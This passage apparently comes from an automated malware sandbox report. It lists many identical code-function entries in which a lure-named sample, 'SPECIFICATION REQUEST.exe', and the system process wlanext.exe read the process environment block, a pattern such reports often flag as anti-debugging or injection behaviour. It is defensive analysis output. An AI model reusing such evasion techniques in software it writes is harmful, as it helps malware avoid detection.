            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01123A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01118A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01144A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01144A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01194257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01109240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0114927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011BB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011BB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01113D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01134D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01134D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01134D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0118A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01127D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01143D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01183540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011B3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01132581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01102D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01102D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01102D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01102D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01102D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01131DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01131DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01131DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011335A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011B8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01186CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01104F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01104F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01118794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01187794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01187794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01187794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011437F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0113A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01138E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011C1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011BFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0110E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01117E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01117E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01117E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01117E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01117E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01117E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011CAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0112AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0111766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_0119FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011846A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011D8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_01148EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011BFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011336CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011316E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeCode function: 2_2_011176E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03398B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03395BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032D1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032D1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0337D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033723E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033723E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033723E3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033453CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033453CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03304A2C mov eax, dword ptr fs:[00000030h]
